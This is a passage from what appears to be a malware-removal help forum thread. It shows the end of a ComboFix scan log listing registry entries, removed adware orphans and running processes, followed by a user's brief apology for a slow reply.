IE: &D&ownload &with BitComet - c:\program files (x86)\BitComet\BitComet.exe/AddLink.htm
IE: &D&ownload all video with BitComet - c:\program files (x86)\BitComet\BitComet.exe/AddVideo.htm
IE: &D&ownload all with BitComet - c:\program files (x86)\BitComet\BitComet.exe/AddAllLink.htm
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780\
user_pref(extensions.autoDisableScopes,14);
.
.
------- File Associations -------
.
inifile="%SystemRoot%\system32\NOTEPAD.EXE" %1
txtfile="%SystemRoot%\system32\NOTEPAD.EXE" %1
.
- - - - ORPHANS REMOVED - - - -
.
URLSearchHooks-{1392b8d2-5c05-419f-a8f6-b9f15a596612} - (no file)
Wow6432Node-HKLM-Run-BlueStacks Agent - c:\program files (x86)\BlueStacks\HD-Agent.exe
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
WebBrowser-{1392B8D2-5C05-419F-A8F6-B9F15A596612} - (no file)
ShellIconOverlayIdentifiers-{472083B0-C522-11CF-8763-00608CC02F24} - (no file)
AddRemove-SearchProtect - c:\progra~2\SearchProtect\Main\bin\uninstall.exe
AddRemove-Dealply - c:\users\User\AppData\Roaming\DealPly\UpdateProc\UpdateTask.exe
AddRemove-GoforFiles - c:\program files (x86)\GoforFiles\uninstall.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCCUJobMgr]
"ImagePath"="\"c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe\" /s \"PCCUJobMgr\" /m \"c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\diMaster.dll\" /prefetch:1"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\npggsvc]
"ImagePath"="c:\windows\system32\GameMon.des -service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\xsherlock]
"ImagePath"="c:\windows\system32\xsherlock.xem"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{95B7759C-8C7F-4BF1-B163-73684A933233}"=hex:51,66,7a,6c,4c,1d,38,12,f2,76,a4,
   91,4d,c2,9f,0e,ce,75,30,28,4f,cd,76,27
"{98889811-442D-49DD-99D7-DC866BE87DBC}"=hex:51,66,7a,6c,4c,1d,38,12,7f,9b,9b,
   9c,1f,0a,b3,0c,e6,c1,9f,c6,6e,b6,39,a8
"{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}"=hex:51,66,7a,6c,4c,1d,38,12,3a,25,4d,
   8a,1f,e3,d1,0d,d3,3b,92,3f,05,d7,c9,12
"{0FB6A909-6086-458F-BD92-1F8EE10042A0}"=hex:51,66,7a,6c,4c,1d,38,12,67,aa,a5,
   0b,b4,2e,e1,00,c2,84,5c,ce,e4,5e,06,b4
"{18DF081C-E8AD-4283-A596-FA578C2EBDC3}"=hex:51,66,7a,6c,4c,1d,38,12,72,0b,cc,
   1c,9f,a6,ed,07,da,80,b9,17,89,70,f9,d7
"{2EECD738-5844-4A99-B4B6-146BF802613B}"=hex:51,66,7a,6c,4c,1d,38,12,56,d4,ff,
   2a,76,16,f7,0f,cb,a0,57,2b,fd,5c,25,2f
"{39F7E362-828A-4B5A-BCAF-5B79BFDFEA60}"=hex:51,66,7a,6c,4c,1d,38,12,0c,e0,e4,
   3d,b8,cc,34,0e,c3,b9,18,39,ba,81,ae,74
"{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}"=hex:51,66,7a,6c,4c,1d,38,12,7c,f0,b1,
   38,5c,21,3d,0e,d9,78,0d,25,e1,c9,8c,d4
"{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}"=hex:51,66,7a,6c,4c,1d,38,12,07,5b,93,
   aa,6e,60,ba,0b,f0,6d,b2,b7,80,44,00,83
"{DBC80044-A445-435B-BC74-9C25C1C588A9}"=hex:51,66,7a,6c,4c,1d,38,12,2a,03,db,
   df,77,ea,35,06,c3,62,df,65,c4,9b,cc,bd
"{97F2FF5B-260C-4CCF-834A-2DDA4E29E39E}"=hex:51,66,7a,6c,4c,1d,38,12,35,fc,e1,
   93,3e,68,a1,09,fc,5c,6e,9a,4b,77,a7,8a
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:62,71,2e,4e,51,26,cd,01
.
[HKEY_USERS\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_17_0_0_188_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_17_0_0_188_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_17_0_0_188_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_17_0_0_188_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.17"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\windows\SysWOW64\PnkBstrA.exe
c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
c:\program files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
c:\program files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
c:\program files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
c:\program files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
c:\program files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
c:\program files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
c:\program files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
.
**************************************************************************
.
Completion time: 2015-06-28  19:35:12 - machine was rebooted
ComboFix-quarantined-files.txt  2015-06-28 23:35
.
Pre-Run: 403,042,234,368 bytes free
Post-Run: 417,521,885,184 bytes free
.
- - End Of File - - 5CCF21C8620633B42E0125960988EEB1
A36C5E4F47E84449FF07ED3517B43A31


sorry it took so long to reply, I lost internet connection






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users